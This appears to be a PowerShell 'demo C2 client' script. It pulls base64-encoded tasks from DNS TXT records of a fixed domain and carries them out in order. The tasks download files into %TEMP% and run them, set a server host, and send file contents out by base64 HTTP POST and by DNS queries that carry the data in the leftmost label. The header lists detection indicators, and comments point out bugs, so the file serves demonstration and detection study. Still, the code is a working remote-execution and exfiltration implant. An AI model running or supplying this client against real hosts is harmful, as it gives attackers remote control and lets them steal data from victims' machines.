demo-c2-client.ps1
<#
.SYNOPSIS
    Demo "C2 client": fetches its tasking from DNS TXT records, executes the
    tasks in order, and reports file contents back over HTTP and DNS.

.DESCRIPTION
    Flow of the script as written below:
      1. Resolve the TXT records of $dnsName (optionally via a specific resolver).
      2. Base64-decode every TXT string and split it on ";" into the fields
         Origin;Number;Command;Parameter.
      3. Sort the decoded entries by Number and run them one by one.
    Commands handled by the Switch: Write, Get, PS, Set, http, DNS. Everything
    the script does is decided by whoever controls the TXT records of $dnsName,
    so those records amount to remote command execution on the running host.

    Defensive / detection notes, all derived from the code below:
      - A TXT lookup for the tasking domain, later followed by lookups whose
        leftmost label is a long base64-like string (the "DNS" command).
      - A file written to %TEMP% by Invoke-WebRequest and then executed from
        that same directory with the call operator (the "Get" + "PS" pair).
      - An HTTP POST whose body is base64 text, sent to a host chosen at run
        time by the "Set" command, over plain http:// (no TLS).
      - Nothing in the script verifies what it downloads or runs: there is no
        hash, signature or source check on the TXT data or the fetched file.

.PARAMETER dnsName
    Domain whose TXT records carry the tasking. Defaults to the demo domain.

.PARAMETER demoC2DnsServer
    Optional resolver to query instead of the system resolver. When empty, the
    system resolver is used both for the initial TXT lookup and for the "DNS"
    command's queries.
#>
PARAM (
    [string] $dnsName = "c2demo.ronnkvist.nu",
    [string] $demoC2DnsServer
)

# DNS Lookup
# Fetch the tasking: every TXT string of $dnsName is one base64-encoded task.
Write-Host "Using DNS TXT-records from: $($dnsName)"
if ($demoC2DnsServer) {
    Write-Host " DNS-Server: $($demoC2DnsServer)"
    $dnsLookup = Resolve-DnsName $dnsName -Type TXT -Server $demoC2DnsServer
} else {
    $dnsLookup = Resolve-DnsName $dnsName -Type TXT
}
Write-Host ""
Write-Host "TXT Strings Found:"
# If the lookup returned nothing, $dnsLookup.Strings is empty and the
# pipelines below simply do nothing; no explicit error is raised here.
$dnsLookup.Strings | ForEach-Object {
    Write-Host " $($_)"
}

# Decode TXT strings from Base64
# Each decoded string is expected to be "Origin;Number;Command;Parameter".
# There is no validation of the field count: a string with fewer than four
# ";"-separated parts yields $null for the missing properties, and a Parameter
# that itself contains ";" is truncated at that character by Split.
# A TXT string that is not valid base64 makes FromBase64String throw.
Write-Host ""
$c2Commands = @()
Write-Host "Base64 Decoded TXT Strings:"
$dnsLookup.Strings | ForEach-Object {
    $decoded = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($_))
    Write-Host " $($decoded)"
    $cmd = $decoded.Split(";")
    $c2Command = New-Object System.Object
    $c2Command | Add-Member -MemberType NoteProperty -Name Origin -Force -Value $cmd[0]
    $c2Command | Add-Member -MemberType NoteProperty -Name Number -Force -Value $cmd[1]
    $c2Command | Add-Member -MemberType NoteProperty -Name Command -Force -Value $cmd[2]
    $c2Command | Add-Member -MemberType NoteProperty -Name Parameter -Force -Value $cmd[3]
    $c2Commands += $c2Command
}

# Sort commands by "Number"
# NOTE: Number is a string (it comes straight from Split), so this sort is
# lexical, not numeric: "10" sorts before "2". Task numbers above 9 will
# therefore not run in the order a human would expect.
$c2Commands = $c2Commands | Sort-Object Number
Write-Host ""
Write-Host "Commands:"
$c2Commands | Format-Table * -AutoSize

# Run commands
# All file operations below are relative to the user's %TEMP% directory.
# $c2Server starts as the literal "unknown"; it only changes via a "Set"
# task, so an "http" task that sorts before "Set" posts to http://unknown.
Write-Host ""
Write-Host "Running commands:"
$tempDir = (Get-Item ENV:Temp).Value
$c2Server = "unknown"
foreach ($c2 in $c2Commands) {
    Switch ($c2.Command) {
        # Write: print the Parameter; no side effects beyond console output.
        "Write" {
            Write-Host "Write: " -ForegroundColor Yellow -NoNewline
            Write-Host "$($c2.Parameter)"
        }
        # Get: download Parameter (a URL) into %TEMP%. The local file name is
        # the last "/"-separated segment of the URL, taken as-is. The download
        # is not verified in any way before later tasks may execute it.
        "Get" {
            Write-Host "Download file from remote host: " -ForegroundColor Yellow
            Write-Host " Remote: $($c2.Parameter)"
            $s = $c2.Parameter.Split("/")
            $OutFile = Join-Path $tempDir $s[$s.Count - 1]
            Write-Host " File: $($OutFile)"
            Invoke-WebRequest -Uri $c2.Parameter -OutFile $OutFile
        }
        # PS: execute the script file named by Parameter from %TEMP% with the
        # call operator, under the current user's privileges (and subject to
        # the host's execution policy). Combined with "Get" this is the
        # download-and-execute step of the demo.
        "PS" {
            Write-Host "Run Script: " -ForegroundColor Yellow -NoNewline
            Write-Host $c2.Parameter
            $scriptToRun = Join-Path $tempDir $c2.Parameter
            Write-Host $scriptToRun
            Write-Host "----------------------------------------------------------" -ForegroundColor Gray
            & $scriptToRun
            Write-Host "----------------------------------------------------------" -ForegroundColor Gray
        }
        # Set: remember the host used by later "http" tasks.
        "Set" {
            Write-Host "Set C2 Server: " -ForegroundColor Yellow -NoNewline
            Write-Host $c2.Parameter
            $c2Server = $c2.Parameter
        }
        # http: read the %TEMP% file named by Parameter, base64 it, and POST it
        # in clear text to http://$c2Server. The .Trim() call assumes a
        # single-line file; a multi-line file makes Get-Content return an
        # array, and the GetBytes call is then not well defined — TODO confirm.
        # A failed request leaves $webRequest empty, so the Status line below
        # prints blanks rather than an error.
        "http" {
            Write-Host "Post information in file to Server" -ForegroundColor Yellow
            Write-Host " File: $(Join-Path $tempDir $c2.Parameter)"
            Write-Host " Server: http://$($c2Server)"
            $fileContent = (Get-Content (Join-Path $tempDir $c2.Parameter)).Trim()
            Write-Host " Content: $($fileContent)"
            [string]$encodedContent = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($fileContent))
            Write-Host " Base64: $($encodedContent)"
            $webRequest = Invoke-WebRequest -Uri "http://$($c2Server)" -Method POST -Body $encodedContent
            Write-Host " Status: HTTP $($webRequest.StatusCode) - $($webRequest.StatusDescription)"
        }
        # DNS: encode the file content and send it as the leftmost label of a
        # query for <content>.$dnsName. Only "=" and "+" are rewritten; "/" is
        # left in place although it is not a valid host-name character, and
        # nothing splits the content to respect DNS label/name length limits,
        # so larger or "/"-containing content produces a query that fails.
        # -ErrorAction SilentlyContinue hides that failure; the result of the
        # lookup is never checked.
        "DNS" {
            Write-Host "Upload file via DNS queries" -ForegroundColor Yellow
            Write-Host " File: $(Join-Path $tempDir $c2.Parameter)"
            $fileContent = (Get-Content (Join-Path $tempDir $c2.Parameter)).Trim()
            Write-Host " Content: $($fileContent)"
            [string]$encodedContent = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($fileContent))
            Write-Host " Base64: $($encodedContent)"
            $dnsOkContent = $encodedContent.Replace("=", "-").Replace("+", "_")
            Write-Host " DNS OK: $($dnsOkContent)"
            Write-Host " Query: $($dnsOkContent).$($dnsName)"
            if ($demoC2DnsServer) {
                Write-Host " Server: $($demoC2DnsServer)"
                Resolve-DnsName "$($dnsOkContent).$($dnsName)" -Server $demoC2DnsServer -ErrorAction SilentlyContinue
            } else {
                Resolve-DnsName "$($dnsOkContent).$($dnsName)" -ErrorAction SilentlyContinue
            }
        }
        # Anything else is reported and skipped.
        default {
            Write-Host "Unknown: " -ForegroundColor Red -NoNewline
            Write-Host $c2.Command
        }
    }
    Write-Host ""
}